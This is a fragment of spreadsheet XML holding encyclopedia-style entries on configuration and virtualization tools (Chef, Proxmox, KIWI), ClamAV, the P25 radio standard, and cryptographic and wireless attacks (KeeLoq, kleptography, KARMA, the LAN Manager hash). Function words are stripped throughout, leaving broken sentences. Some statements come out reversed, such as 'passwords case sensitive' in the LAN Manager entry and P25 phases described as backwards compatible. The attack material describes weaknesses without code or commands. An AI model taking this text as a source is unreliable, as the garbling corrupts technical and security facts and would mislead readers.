  </si>
  <si>
    <t>progress chef (formerly chef) configuration management tool written ruby erlang. uses pure-ruby, domain-specific language (dsl) writing system configuration "recipes". chef used streamline task configuring maintaining company's servers, integrate cloud-based platforms amazon ec2, google cloud platform, oracle cloud, openstack, cloud, microsoft azure, rackspace automatically provision configure machines. chef contains solutions small large scale systems. features user writes "recipes" describe chef manages server applications utilities (such apache http server, mysql, hadoop) configured. these recipes (which grouped together "cookbook" easier management) describe series resources particular state: packages installed, services running, files written. these various resources configured specific versions software ensure software installed correct order based dependencies. chef makes sure resource properly configured corrects resources desired state.chef client/server mode, standalone configuration named "chef-solo". client/server mode, chef client sends various attributes node chef server. server uses elasticsearch index attributes provides clients query information. chef recipes query attributes resulting data help configure node.traditionally, chef used manage linux later versions support microsoft windows.it major configuration management systems linux, along cfengine, ansible puppet. more configuration management tool, chef, along puppet ansible, industry's notable infrastructure code (iac) tools. history chef created adam jacob tool consulting company, whose business model build end-to-end server/deployment tools. jacob showed chef jesse robbins, potential running operations amazon. they founded company barry steinglass, nathen haneysmith, joshua timberman turn chef product.the project originally named "marionette", word long cumbersome type; naming format modules prepared "recipe" project renamed "chef".in february 2013, opscode released version chef. changes release included complete rewrite core server erlang.on april 2019, company announced products open source apache license.on september 2020, progress announced acquisition chef. platform support chef supported multiple platforms according supported platforms matrix client server products. major platform support clients includes aix, amazon linux, debian, centos/rhel, freebsd, macos, solaris, suse linux, microsoft windows ubuntu. additional client platforms include arch linux fedora. chef server supported rhel/centos, oracle linux, suse linux ubuntu. customers chef used facebook, opsworks, prezi, blackline. also comparison open-source configuration management software infrastructure code (iac) infrastructure code tools ansible (software) cfengine (software) devops devops toolchain otter (software) puppet salt (software) juju references external links official website chef github</t>
  </si>
  <si>
    <t>KlamAV</t>
  </si>
  <si>
    <t>clam antivirus (clamav) free software, cross-platfom antimalware toolkit able detect many types malware, including viruses. developed unix third party versions available aix, bsd, hp-ux, linux, macos, openvms, (tru64) solaris. version 0.97.5, clamav builds runs microsoft windows. both clamav updates made available free charge. main uses mail servers server-side email virus scanner. sourcefire, developer intrusion detection products owner snort, announced august 2007 acquired trademarks copyrights clamav five developers. upon joining sourcefire, clamav team joined sourcefire vulnerability research team (vrt). turn, cisco acquired sourcefire 2013. sourcefire became cisco talos, clamav development remains there. features clamav includes command-line scanner, automatic database updater, scalable multi-threaded daemon running anti-virus engine shared library. application features milter interface sent mail on-demand scanning. recognizes: zip, rar, tar, gzip, bzip2, ole2, cabinet, chm, binhex, formats most mail file formats portable executable (pe) files compressed upx, fsg, petite, nspack, wwpack32, mew, upack, obfuscated sue, y0da cryptor. office open file formats, html, rich text format (rtf) portable document format (pdf).the clamav virus database updated least every four hours february 2017 contained 5,760,000 virus signatures daily update virus number 23040. effectiveness clamav currently tested daily antivirus products shadowserver. 2011, shadowserver tested million samples clamav numerous antivirus products. million samples tested, clamav scored 76.60% ranking higher rating much established competitors.in 2008 av-test comparison antivirus tools, clamav scored poorly on-demand detection, avoiding false positives, rootkit detection.in shadowserver six-month test june december 2011, clamav detected 75.45% viruses tested, putting fifth place behind ahnlab, avira, bitdefender avast. ahnlab, antivirus, detected 80.28%. unofficial databases clamav engine reliably used detect several kinds files. particular, phishing emails detected using antivirus techniques. however, false positive rates inherently higher traditional malware detection.there several unofficial databases clamav: sanesecurity organization maintains number databases; addition distribute classify number similar databases parties, porcupine, julian field, malwarepatrol. securiteinfo.com also provides additional signatures clamav.clamav unofficial signatures mainly used system administrators filter email messages. detections groups scored, rather causing outright block "infected" message. platforms linux, clamav available linux bsd-based operating systems. cases available distribution's repositories installation. linux servers clamav daemon mode, servicing requests scan files sent processes. these include mail exchange programs, files samba shares, packets data passing proxy server. linux desktops clamav provides on-demand scanning individual files, directories whole macos macos server included clamav since version 10.4. used within operating system's email service. paid-for graphical user interface available canimaan software form clamxav. additionally, fink, homebrew macports ported clamav. another program uses clamav engine macos, counteragent. working alongside eudora internet mail server program, counteragent scans emails viruses using clamav also optionally provides spam filtering spamassassin. openvms clamav openvms available alpha itanium platforms. build process simple provides basic functionality, including library, clamscan utility, clamd daemon, freshclam update. windows there ia-32 variants clamav available windows; additionally, cisco's immunet uses clamav engine. os/2 port clamav available os/2 (including ecomstation arcaos) native written rexx. graphical interfaces since clamav include graphical user interface (gui) instead command line, number third-party developers written guis application various platforms uses. these include: linux clamtk using gtk2-perl; project named libraries used began klamav (development original version discontinued 2009). wbmclamav webmin module manage clam antivirus macos clamxav port includes graphical user interfaces "sentry" service watch changes files many cases. there also update scanning scheduler cron facilitated graphical interface. clamxav detect malware specific macos, unix, windows. clamxav application clamav engine updated regularly. clamxav written sold canimaan software ltd. tiger cache cleaner shareware software installs presents graphic interface using clamav scan viruses, provides unrelated functions. microsoft windows immunet clamwin antivirus graugon antivirus clam sentinel os/2 clamav-gui clamwin clamwin graphical user interface front-end clamwin ltd. developed clamav microsoft windows. features include on-demand (user-started) scanning, automatic updates, scheduled scanning, integration file explorer microsoft outlook. clamwin provide on-access scanning. firefox add-on enables clamwin scan downloaded files. several extensions allow users process downloaded files software scan files clamwin. real-time file scanning linux, clamav (versions 0.99 later) supports real-time protection fanotify add-on linux kernel (version later.) alternatively, could clamfs (for unix-like operating system supporting fuse). microsoft windows, free, open-source called clam sentinel detects file changes scans modified files using clamwin. works windows later. addition on-access scanning, features optional system change messages proactive heuristic protection. patent lawsuit 2008, barracuda networks sued trend micro distribution clamav part security package. trend micro claimed barracuda's utilization clamav infringes software patent filtering viruses internet gateway. free software community responded part calling boycott trend micro. boycott also endorsed free software foundation. barracuda networks counter-sued ibm-obtained patents july 2008. 2011, u.s. patent trademark office issued final rejection reexamination trend micro's u.s. patent 5,623,600. also list antivirus software list free open-source software packages software patents free software references further reading interview clamav founder tomasz kojm archived version external links official website</t>
  </si>
  <si>
    <t>Project 25</t>
  </si>
  <si>
    <t>project (p25 apco-25) suite standards interoperable digital two-way radio products. developed public safety professionals north america gained acceptance public safety, security, public service, commercial applications worldwide. radios direct replacement analog (typically radios, ability transfer data well voice, allowing natural implementations encryption text messaging. radios commonly implemented dispatch organizations, police, fire, ambulance emergency rescue service, using vehicle-mounted radios combined handheld walkie-talkie use. starting around 2012, products became available newer phase modulation protocol, older protocol known became phase phase products advanced ambe2+ vocoder, allows audio pass compressed bitstream provides tdma voice channels bandwidth (12.5 khz), phase provide voice channel. protocols compatible. however, phase infrastructure provide "dynamic transcoder" feature translates phase phase needed. addition this, phase radios backwards compatible phase modulation analog modulation, standard. european union created terrestrial trunked radio (tetra) digital mobile radio (dmr) protocol standards, fill similar role project suite standards overview history public safety radios upgraded analog digital since 1990s increased data radio systems features location, trunking, text messaging, metering, encryption. various user protocols different public safety radio spectrum made difficult public safety agencies achieve interoperability widespread acceptance. however, lessons learned disasters united states faced past decades forced agencies assess requirements disaster basic infrastructure failed. meet growing demands public safety digital radio communication, united states federal communications commission (fcc) direction united states congress initiated 1988 inquiry recommendations users manufacturers improve existing communication systems. based recommendations, find solutions best serve needs public safety management, october 1989 apco project came existence coalition with: association public-safety communications officials-international (apco) national association state telecommunications directors (nastd) national telecommunications information administration (ntia) national communications system (ncs) national security agency (nsa) department defense (dod)a steering committee consisting representatives above-mentioned agencies along fpic (department homeland security federal partnership interoperable communication), coast guard department commerce's national institute standards technology (nist), office enforcement standards established decide priorities scope technical development p25. introduction interoperable emergency communication integral initial response, public health, community safety, national security economic stability. problems experienced disaster events, serious poor communication lack appropriate efficient means collect, process, transmit important information timely fashion. cases, radio communication systems incompatible inoperable within jurisdiction within departments agencies community. non-operability occurs outdated equipment, limited availability radio frequencies, isolated independent planning, lack coordination, cooperation, agencies, community priorities competing resources, funding ownership, control communications systems. recognizing understanding need, project (p25) initiated collaboratively public safety agencies manufacturers address issue emergency communication systems. collaborative project ensure two-way radios interoperable. goal enable public safety responders communicate and, thus, achieve enhanced coordination, timely response, efficient effective communications equipment.p25 established address need common digital public safety radio communications standards first-responders homeland security/emergency response professionals. telecommunications industry association's tr-8 engineering committee facilitates work role ansi-accredited standards development organization (sdo) published suite standards tia-102 series documents, include separate parts land mobile radio tdma implementations technology public safety. project (p25) standards produced joint efforts association public safety communications officials international (apco), national association state telecommunications directors (nastd), selected federal agencies national communications system (ncs), standardized telecommunications industry association (tia)... suite standards involves digital land mobile radio (lmr) services local, state/provincial national (federal) public safety organizations agencies... applicable equipment authorized licensed, u.s., ntia rules regulations. although developed primarily north american public safety services, technology products limited public safety alone also selected deployed private system application, worldwide. p25-compliant systems increasingly adopted deployed. radios communicate analog mode legacy radios, either digital analog mode radios. additionally, deployment p25-compliant systems allow high degree equipment interoperability compatibility. standards proprietary improved multi-band excitation (imbe) advanced multi-band excitation (ambe+2) voice codecs designed digital voice systems, inc. encode/decode analog audio signals. rumored licensing cost voice-codecs used standard devices main reason cost compatible devices high.p25 used "talk around" mode without intervening equipment radios, conventional mode radios communicate repeater base station without trunking trunked mode traffic automatically assigned voice channels repeater base station. protocol supports data encryption standard (des) encryption bit), 2-key triple-des encryption, three-key triple-des encryption, advanced encryption standard (aes) encryption bits keylength, bits, sold motorola advanced digital privacy), encryption. protocol also supports accordion 1.3, baton, firefly, mayfly saville type ciphers. open interfaces p25's suite standards specify eight open interfaces various components land mobile radio system. these interfaces are: common interface (cai) standard specifies type content signals transmitted compliant radios. radio using able communicate radio, regardless manufacturer subscriber data peripheral interface standard specifies port mobiles portables connect laptops data networks fixed station interface standard specifies mandatory messages supporting digital voice, data, encryption telephone interconnect necessary communication fixed station subsystem console subsystem interface standard specifies basic messaging interface console subsystem subsystem network management interface standard specifies single network management scheme allow network elements subsystem managed data network interface standard specifies subsystem's connections computers, data networks, external data sources telephone interconnect interface standard specifies interface public switched telephone network (pstn) supporting analog isdn telephone interfaces. inter subsystem interface (issi) standard specifies interface subsystems allow connected wide area networks phases p25-compliant technology deployed main phases future phases finalized. phase phase radio systems operate 12.5 digital mode using single user channel access method. phase radios continuous level (c4fm) modulation—a special type 4fsk modulation—for digital transmissions 4,800 baud bits symbol, yielding 9,600 bits second total channel throughput. 9,600, 4,400 voice data generated imbe codec, 2,800 forward error correction, 2,400 signalling control functions. receivers designed c4fm standard also demodulate "compatible quadrature phase shift keying" (cqpsk) standard, parameters cqpsk signal chosen yield signal deviation symbol time c4fm. phase uses imbe voice codec. these systems involve standardized service facility specifications, ensuring manufacturers' compliant subscriber radio access services described specifications. abilities include backward compatibility interoperability systems, across system boundaries, regardless system infrastructure. addition, suite standards provides open interface radio frequency (rf) subsystem facilitate interlinking different vendors' systems. phase improve spectrum use, phase developed trunking systems using 2-slot tdma scheme required trunking systems band. phase uses ambe+2 voice codec reduce needed bitrate voice channel require 6,000 bits second (including error correction signalling). phase backwards compatible phase (due tdma operation), although multi-mode tdma radios systems capable operating phase mode required, enabled. subscriber radio cannot tdma transmission without synchronization source; therefore direct radio radio communication resorts conventional fdma digital operation. multi-band subscriber radios also operate narrow-band lowest common denominator almost radios. this makes analog narrow-band facto "interoperability" mode time. originally implementation phase planned split 12.5 channel 6.25 slots, frequency-division multiple access (fdma). however proved advantageous existing 12.5 frequency allocations time division multiple access (tdma) mode number reasons. allowed subscriber radios save battery life transmitting half time also yields ability subscriber radio listen respond system requests transmissions. phase known 6.25 "bandwidth equivalent" satisfies requirement voice transmissions occupy less bandwidth. voice traffic phase system transmits full 12.5 frequency allocation, phase system does, however faster data rate kbit/s allowing simultaneous voice transmissions. subscriber radios also transmit full 12.5 khz, on/off repeating fashion resulting half transmission thus equivalent 6.25 radio. this accomplished using ambe voice coder uses half rate phase imbe voice coders. beyond phase from 2000 2009, european telecommunications standards institute (etsi) working collaboratively public safety partnership project project mesa (mobility emergency safety applications), sought define unified requirements next-generation aeronautical terrestrial digital wideband/broadband radio standard could used transmit receive voice, video, high-speed data wide-area, multiple-agency networks deployed public safety agencies.the final functional technical requirements released etsi expected shape next phases american project european dmr, dpmr, tetra, interest industry followed, since requirements could available commercial off-the-shelf technology, project closed 2010.during united states 2008 wireless spectrum auction, allocated radio band spectrum freed digital transition public safety networks. expects providers employ high-speed data video applications. conventional implementation systems resort using band signaling continuous tone-coded squelch system (ctcss) tone digital-coded squelch (dcs) codes access control. instead called network access code (nac) included outside digital voice frame. this 12-bit code prefixes every packet data sent, including carrying voice transmissions. feature similar ctcss analog radios. that radios programmed pass audio receiving correct nac. nacs programmed three-hexadecimal-digit code transmitted along digital signal transmitted. since three-hexadecimal-digit number bits), 4,096 possible nacs programming, analog methods combined. three possible nacs special functions: 0x293 ($293) default 0xf7e ($f7e) receiver pass audio decoded signal received 0xf7f ($f7f) repeater receiver allow incoming decoded signals repeater transmitter retransmit received nac. adoption adoption standards slowed budget problems however, funding communications upgrades department homeland security usually requires migrating project also used countries worldwide including australia, zealand, brazil, canada, india russia. mid-2004 networks deployed countries. time, 2005, european terrestrial trunked radio (tetra) deployed sixty countries, preferred choice europe, china, countries. this largely based tetra systems many times cheaper systems ($900 $6,000 radio) time. however radio prices rapidly approaching parity tetra radio prices increased competition market. majority networks based northern america advantage system coverage frequency bandwidth earlier analog systems channels easily upgraded one. some networks also allow intelligent migration analog radios digital radios operating within network. both tetra offer varying degrees functionality, depending available radio spectrum, terrain project budget. while interoperability major goal p25, many features present interoperability challenges. theory, compliant equipment interoperable. practice, interoperable communications achievable without effective governance, standardized operating procedures, effective training exercises, inter-jurisdictional coordination. difficulties inherent developing networks using features digital voice, encryption, trunking sometimes result feature-backlash organizational retreat minimal "feature-free" implementations fulfill letter project migration requirement without realizing benefits thereof. additionally, technical issue frictions often result unwieldy bureaucratic inter-agency processes tend develop order coordinate interoperability decisions. naming technology regions australia, technology deployed public safety officers name (government radio networks) nsw, south australia, tasmania), (government wireless networks) qld). melbourne metropolitan radio (mmr) rural mobile radio (rmr) victorian government radio networks) project compliance assessment program (p25 cap) united states dhs's project compliance assessment program (p25 cap) aims interoperability among different vendors testing standards. cap, voluntary program, allows suppliers publicly attest products' compliance.independent, accredited labs test vendor's radios compliance standards, derived tia-102 standards following tia-tr8 testing procedures. only approved products purchased using federal grant dollars. generally, non-approved products trusted meet standards performance, conformance, interoperability. product labeling varies. "p25" "p25 compliant" mean nothing high standards apply vendor claim product "p25 compliant" "p25 compliant statement requirements (p25 sor)" security flaws op25 project—encryption flaws des-ofb ciphers securecomm 2011 conference london, security researcher steve glass presented paper, written co-author matt ames, explained des-ofb motorola's proprietary (rc4 based) ciphers vulnerable brute force recovery. this research result op25 project uses radio ettus universal software radio peripheral (usrp) implement open source packet sniffer analyzer. op25 project founded steve glass early 2008 performing research wireless networks part thesis. paper available download nicta website. university pennsylvania research 2011, wall street journal published article describing research security flaws system, including user interface makes difficult users recognize transceivers operating secure mode. according article, "(r)esearchers university pennsylvania overheard conversations included descriptions undercover agents confidential informants, plans forthcoming arrests information technology used surveillance operations." researchers found messages sent radios sent segments, blocking portion segments result entire message jammed. "their research also shows radios effectively jammed (single radio, short range) using highly modified pink electronic child’s standard used radios 'provides convenient means attacker' continuously track location radio’s user. with systems, jammers expend power block communications, radios allow jamming relatively power, enabling researchers prevent reception using pager designed pre-teens." report presented 20th usenix security symposium francisco august 2011. report noted number security flaws project system, specific implemented inherent security design. encryption lapses report find breaks encryption; however, observed large amounts sensitive traffic sent clear implementations problems. they found switch markings secure clear modes difficult distinguish this exacerbated fact radios secure mode continue operate without issuing warning another party switches clear mode. addition, report authors said many systems change keys often, increasing risk individual radio properly keyed, forcing users transmit clear maintain communications radio. jamming vulnerability design choice lower levels error correction portions encoded voice data deemed less critical intelligibility. result, errors expected typical transmissions, harmless voice communication, presence errors force stream ciphers, tolerate errors, prevents standard technique, message authentication codes (macs), protect message integrity stream cipher attacks. varying levels error correction implemented breaking message frames subframes. this allows attacker entire messages transmitting certain short subframes critical reception entire frame. result, attacker effectively project signals average power levels much lower power levels used communication. such attacks targeted encrypted transmissions only, forcing users transmit clear. because project radios designed work existing two-way radio frequency channels, cannot spread spectrum modulation, inherently jam-resistant. optimal spread spectrum system require effective jammer 1,000 times much power more) individual communicators. according report, jammer could effectively operate 1/25th power less) communicating radios. authors developed proof-of-concept jammer using texas instruments cc1110 single chip radio, found inexpensive toy. traffic analysis active tracking certain metadata fields project protocol encrypted, allowing attacker perform traffic analysis identify users. because project radios respond data packets addressed retransmission request, attacker deliberately send packets forcing specific radio transmit even user attempting maintain radio silence. such tracking authorized users considered feature p25, referred "presence".the report's authors concluded saying reasonable wonder protocol, developed many years used sensitive critical applications, difficult vulnerable attack." authors separately issued recommendations users mitigate problems found. these include disabling secure/clear switch, using network access codes segregate clear encrypted traffic, compensating unreliability over-the-air rekeying extending life. comparison tetra tetra used fifty-three countries worldwide public safety private sector radio networks. there differences features capacities: tetra optimized high population density areas, spectral efficiency time slots khz. (four communications channels channel, efficient spectrum). supports full-duplex voice communication, data, messaging. provide simulcast. optimized wider area coverage population density, also supports simulcast. however, limited respect data support. there major subdivision within radio systems: phase operates analogue, digital, mixed mode single 12.5 channel. phase uses 2-timeslot tdma structure 12.5 channel. also apco-16, earlier standard specified trunking formats radio operation digital audio broadcasting digital terrestrial television government radio networks australia, examples deployment technology nxdn, two-way digital radio standard similar characteristics (optional tdma) terrestrial trunked radio, tetra, european(eu) standard equivalent notes external links official website overview standards development activities public safety https://web.archive.org/web/20110223005820/http://www.apco911.org/frequency/project25.php apco international project page http://www.apco.ca/ archived 2018-05-14 wayback machine apco canada http://www.dvsinc.com/papers/p25_training_guide.pdf daniels' radio system training guide https://valid8.com/solutions/p25-issi-cssi-conformance compliance test tools issi cssi https://web.archive.org/web/20170611161725/http://www.dvsinc.com/prj25.htm dvsi vocoder software hardware http://www.p25phase2.com radio users experts discuss phase</t>
  </si>
  <si>
    <t>KIWI (openSUSE)</t>
  </si>
  <si>
    <t>kiwi application making wide variety image sets linux supported hardware platforms well virtualization systems including qemu, vmware. developed opensuse project used create opensuse linux distribution, also employed build variety linux distributions. usage documentation kiwi large amount documentation available, organized 'cook books' guide users process creating increasingly complicated kiwi images. basic usage requires installation number tools besides kiwi, notably virtualization. kiwi command line tool graphical user interface. kiwi kiwi used variety organizations variety places. besides suse linux opensuse project, product using kiwi dell employs well. suse studio suse studio interface (ruby rails) kiwi open build service. allows users graphically together custom linux generate output including large variety virtual machine disk images. also boot image image references external links kiwi homepage open build service homepage</t>
  </si>
  <si>
    <t>LEX (cipher)</t>
  </si>
  <si>
    <t>stream cipher based round transformation aes. provides agility short message block performance handling longer messages faster aes. addition, hardware software flexibility aes, hardware implementations share resources implementations. designed alex biryukov, phase focus candidate estream project. patented. revision protects slide attack found earlier version. external links estream page</t>
  </si>
  <si>
    <t>KeeLoq</t>
  </si>
  <si>
    <t>keeloq proprietary hardware-dedicated block cipher uses non-linear feedback shift register (nlfsr). uni-directional command transfer protocol designed frederick bruwer nanoteq (pty) ltd., cryptographic algorithm created gideon kuhn university pretoria, silicon implementation willem smit nanoteq (south africa) mid-1980s. keeloq sold microchip technology 1995 million. used "code hopping" encoders decoders ntq105/106/115/125d/129d, hcs101/2xx/3xx/4xx/5xx mcs31x2. keeloq used many remote keyless entry systems companies chrysler, daewoo, fiat, honda, toyota, volvo, volkswagen group, clifford, shurlok, jaguar. description keeloq "code hopping" encoders encrypt 0-filled 32-bit block keeloq cipher produce 32-bit "hopping code". 32-bit initialization vector linearly added (xored) least significant bits prior encryption decryption. keeloq cipher accepts 64-bit keys encrypts 32-bit blocks executing single-bit nlfsr rounds. nlfsr feedback function 0x3a5c742e {\displaystyle f(a,b,c,d,e)=d\oplus e\oplus ac\oplus ae\oplus bc\oplus be\oplus cd\oplus de\oplus ade\oplus ace\oplus abd\oplus abc} keeloq uses bits nlfsr state inputs encryption bits decryption. output linearly combined (xored) bits nlfsr state (bits encryption bits decryption) (bit state encryption state decryption) back nlfsr state every round. versions this article describes classic keyloq protocol, newer versions developed. dual keeloq system timer-based algorithm enhancing classic keeloq system. goal newer version timer-driven counter continuously increments, opposite classic keeloq counter increments based events received. this provides protection capture replay attack, known rolljam samy kamkar's work. attacks replay attack simplicity, individual "code hopping" implementations typically cryptographic nonces timestamping. this makes protocol inherently vulnerable replay attacks: example, jamming channel intercepting code, thief obtain code still usable later stage. this sort "code grabber," theoretically interesting, appear widely used thieves.a detailed description inexpensive prototype device designed built samy kamkar exploit technique appeared 2015. device size wallet could concealed near locked vehicle capture single keyless entry code used later time unlock vehicle. device transmits jamming signal block vehicle's reception rolling code signals owner's fob, recording signals attempts needed unlock vehicle. recorded first code forwarded vehicle owner makes second attempt, recorded second code retained future use. demonstration announced cryptanalysis keeloq first cryptanalyzed andrey bogdanov using sliding techniques efficient linear approximations. nicolas courtois attacked keeloq using sliding algebraic methods. attacks bogdanov courtois pose threat actual implementations seem much vulnerable simple brute-force space reduced code-hopping implementations cipher known date. some keeloq "code grabbers" fpga-based devices break keeloq-based keys brute force within weeks reduced length real world implementations.in 2007, researchers cosic group university leuven, belgium, (k.u.leuven) cooperation colleagues israel found attack system. using details algorithm leaked 2006, researchers started analyze weaknesses. after determining part common cars specific model, unique bits cracked sniffed communication car. microchip introduced 1996 version keeloq 60-bit seed. 60-bit seed used, attacker would require approximately 1011 days processing dedicated parallel brute force attacking machine system broken. side-channel attacks march 2008, researchers chair embedded security ruhr university bochum, germany, presented complete break remote keyless entry systems based keeloq rfid technology. their attack works known building access control systems rely keeloq cipher. attack bochum team allows recovering secret cryptographic keys embedded receiver remote control. based measuring electric power consumption device encryption. applying called side-channel analysis methods power traces, researchers extract manufacturer receivers, regarded master generating valid keys remote controls particular manufacturer. unlike cryptanalytic attack described requires 65536 chosen plaintext-ciphertext pairs days calculation recover key, side-channel attack also applied so-called keeloq code hopping mode operation (a.k.a. rolling code) widely used keyless entry systems (cars, garages, buildings, etc.). devastating practical consequence side-channel analysis attack attacker, previously learned system's master key, clone legitimate encoder intercepting messages encoder distance metres (330 ft). another attack allows reset internal counter receiver (garage door, door, etc.), makes impossible legitimate user open door. references external links microchip keeloq site introduction ultimate keeloq technology hcsxxx encoder family product information ultimate keeloq technology,the next generation security featuring mcs3142 dual keeloq encoder "keeloq decryption algorithm specification" (pdf). archived (pdf) original 2007-04-23. keeloq implementation github source code ruptor bogdanov, andrey (august september 2007). cryptanalysis keeloq block cipher. information security cryptology: third sklois conference, inscrypt 2007, revised selected papers. xining, china. [1]. n.t. courtois g.v. bard, 'algebraic slide attacks keeloq' "university bochum press release complete break keeloq based entry systems" (pdf). physical cryptanalysis keeloq code-hopping applications</t>
  </si>
  <si>
    <t>Proxmox Virtual Environment</t>
  </si>
  <si>
    <t>proxmox virtual environment (proxmox pve) open-source software server virtualization management. hosted type-2 hypervisor operating systems including linux windows hardware. debian-based linux distribution modified ubuntu kernel allows deployment management virtual machines containers. proxmox includes console command-line tools, provides rest third-party tools. types virtualization supported: container-based (starting version replacing openvz used version 3.4, included), full virtualization kvm. includes web-based management interface.proxmox licensed affero general public license, version history development proxmox started dietmar maurer martin maurer, linux developers, found openvz backup tool management gui. appearing time linux, added shortly afterwards. first public release took place april 2008. supported container full virtualization, managed web-based user interface similar commercial offerings. features proxmox open-source server virtualization platform manage virtualization technologies: kernel-based virtual machine (kvm) virtual machines containers single web-based interface. source open, based agpl, company sells optional subscription-based customer support. with subscription, users access enterprise software repository. storage model proxmox supports local storage group, directory zfs, well network storage types iscsi, fibre channel, nfs, glusterfs, ceph. high-availability cluster proxmox clustered across multiple server nodes.since version 2.0, proxmox offers high availability option clusters based corosync communication stack. individual virtual servers configured high availability, using built-in ha-manager. proxmox node becomes unavailable fails virtual servers automatically moved another node restarted. database- fuse-based proxmox cluster filesystem (pmxcfs) makes possible perform configuration cluster node corosync communication stack. live migration least since 2012, cluster, live virtual machines moved physical host another without downtime. since proxmox 1.0, released 29.10.2008 openvz live migration supported. virtual appliances proxmox pre-packaged server software appliances downloaded gui. possible download deploy appliances turnkey linux virtual appliance library. data backup includes backup software, vzdump, allows data compression on-line operation (snapshot mode). since 2020 there's also advanced client-server software called proxmox backup server (pbs), offers deduplication, compression, authenticated encryption incremental backups. also comparison platform virtualization software kernel-based virtual machine (kvm) ovirt references external links official website project wiki</t>
  </si>
  <si>
    <t>Kleptography</t>
  </si>
  <si>
    <t>kleptography study stealing information securely subliminally. term introduced adam young moti yung proceedings advances cryptology—crypto '96. kleptography subfield cryptovirology natural extension theory subliminal channels pioneered simmons sandia national laboratory. kleptographic backdoor synonymously referred asymmetric backdoor. kleptography encompasses secure covert communications cryptosystems cryptographic protocols. this reminiscent steganography studies covert communications graphics, video, digital audio data, forth. kleptographic attack meaning kleptographic attack attack uses asymmetric cryptography implement cryptographic backdoor. example, attack could subtly modify public private pairs generated cryptosystem private could derived public using attacker's private key. well-designed attack, outputs infected cryptosystem would computationally indistinguishable outputs corresponding uninfected cryptosystem. infected cryptosystem black-box implementation hardware security module, smartcard, trusted platform module, successful attack could completely unnoticed. reverse engineer might able uncover backdoor inserted attacker, symmetric backdoor, even himself. however, definition kleptographic backdoor asymmetric reverse-engineer cannot kleptographic attack (asymmetric backdoor) requires private known attacker order backdoor. case, even reverse engineer well-funded gained complete knowledge backdoor, would remain useless extract plaintext without attacker's private key. construction kleptographic attacks constructed cryptotrojan infects cryptosystem opens backdoor attacker, implemented manufacturer cryptosystem. attack necessarily reveal entirety cryptosystem's output; complicated attack technique alternate producing uninfected output insecure data backdoor present. design kleptographic attacks designed generation, diffie–hellman exchange, digital signature algorithm, cryptographic algorithms protocols. ssl, ssh, ipsec protocols vulnerable kleptographic attacks. case, attacker able compromise particular cryptographic algorithm protocol inspecting information backdoor information encoded (e.g., public key, digital signature, exchange messages, etc.) exploiting logic asymmetric backdoor using secret (usually private key). juels guajardo proposed method (kegver) third party verify generation. this devised form distributed generation secret known black itself. this assures generation process modified private cannot reproduced kleptographic attack. examples four practical examples kleptographic attacks (including simplified setup attack rsa) found jcryptool 1.0, platform-independent version open-source cryptool project. demonstration prevention kleptographic attacks means kegver method also implemented jcryptool. dual_ec_drbg cryptographic pseudo-random number generator nist 800-90a thought contain kleptographic backdoor. dual_ec_drbg utilizes elliptic curve cryptography, thought hold private which, together bias flaws dual_ec_drbg, allows decrypt traffic computers using dual_ec_drbg example. algebraic nature attack follows structure repeated dlog kleptogram work young yung. references</t>
  </si>
  <si>
    <t>Known-key distinguishing attack</t>
  </si>
  <si>
    <t>cryptography, known-key distinguishing attack attack model symmetric ciphers, whereby attacker knows find structural property cipher, transformation plaintext ciphertext random. there common formal definition transformation chosen-key distinguishing attack strongly related, attacker choose introduce transformations.these attacks directly compromise confidentiality ciphers, classical scenario, unknown attacker. known-/chosen-key distinguishing attacks apply "open model" instead. they known applicable situations block ciphers converted hash functions, leading practical collision attacks hash.known-key distinguishing attacks first introduced 2007 lars knudsen vincent rijmen paper proposed attack rounds cipher another attack generalized feistel cipher. their attack finds plaintext/ciphertext pairs cipher known key, input output least significant bits zero, less time (where fewer half block size).these attacks also applied reduced-round threefish (skein) phelix. also distinguishing attack pseudorandom permutation ciphertext indistinguishability references further reading sasaki, yasuda. "formalizing known-key "distinguishers" attacks feistel ciphers" (pdf). slides crypto 2010 rump session.{{cite journal}}: maint: uses authors parameter (link)</t>
  </si>
  <si>
    <t>KARMA attack</t>
  </si>
  <si>
    <t>information security, karma attack exploits behaviour wi-fi devices, combined lack access point authentication numerous wifi protocols. variant evil twin attack. details attack first published 2004 dino zovi shaun macaulay.vulnerable client devices broadcast "preferred network list" (pnl), contains ssids access points previously connected willing automatically reconnect without user intervention. these broadcasts encrypted hence received wifi access point range. karma attack consists access point receiving list giving ssid pnl, thus becoming evil twin access point already trusted client.once done, client receives malicious access point's signal strongly genuine access point (for example, genuine access point nowhere nearby), client attempt authenticate access point, attack succeed. attack succeeds, malicious access point becomes middle (mitm), positions deploy attacks victim device.what distinguishes karma plain evil twin attack pnl, allows attacker know, rather simply guess, ssids any) client automatically attempt connect also wireless security references</t>
  </si>
  <si>
    <t>LAN Manager</t>
  </si>
  <si>
    <t>manager discontinued network operating system (nos) available multiple vendors developed microsoft cooperation 3com corporation. designed succeed 3com's 3+share network server software atop heavily modified version ms-dos. history manager os/2 operating system co-developed microsoft, using server message block (smb) protocol. originally used atop either netbios frames (nbf) protocol specialized version xerox network systems (xns) protocol. these legacy protocols inherited previous products ms-net ms-dos, xenix-net ms-xenix, afore-mentioned 3+share. version manager unix-based systems called manager/x also available. 1990, microsoft announced manager host improvements, including support tcp/ip transport protocol smb, using netbios tcp/ip (nbt). last version manager, 2.2, included ms-os/2 1.31 base operating system, remained microsoft's strategic server system release windows advanced server 1993. versions 1987 manager (basic/enhanced) 1989 manager 1991 manager 1992 manager 1992 manager 2.1a 1993 manager 1994 manager 2.2amany vendors shipped licensed versions, including: 3com corporation 3+open manager/x server tapestry torus santa cruz operation password hashing algorithm hash computed follows: user's password restricted maximum fourteen characters. user’s password converted uppercase. user's password encoded system code page. this password null-padded bytes. “fixed-length” password split 7-byte halves. these values used create keys, 7-byte half, converting seven bytes stream significant first, inserting parity every seven bits 1010100 becomes 10101000). this generates bits needed key. ostensibly consists bits; however, actually used algorithm. parity bits added step later discarded.) each keys used des-encrypt constant ascii string “kgs!@#$%”, resulting 8-byte ciphertext values. ciphermode ecb, paddingmode none. these ciphertext values concatenated form 16-byte value, hash. security weaknesses manager authentication uses particularly weak method hashing user's password known hash algorithm, stemming 1980s viruses transmitted floppy disks major concern. although based des, well-studied block cipher, hash several weaknesses design. this makes hashes crackable matter seconds using rainbow tables, minutes using brute force. starting windows replaced ntlm, still vulnerable rainbow tables, brute force attacks unless long, unpredictable passwords used, password cracking. ntlm used logon local accounts except domain controllers since windows vista later versions longer maintain hash default. kerberos used active directory environments. major weaknesses manager authentication protocol are: password length limited maximum characters chosen ascii printable characters. passwords case sensitive. passwords converted uppercase 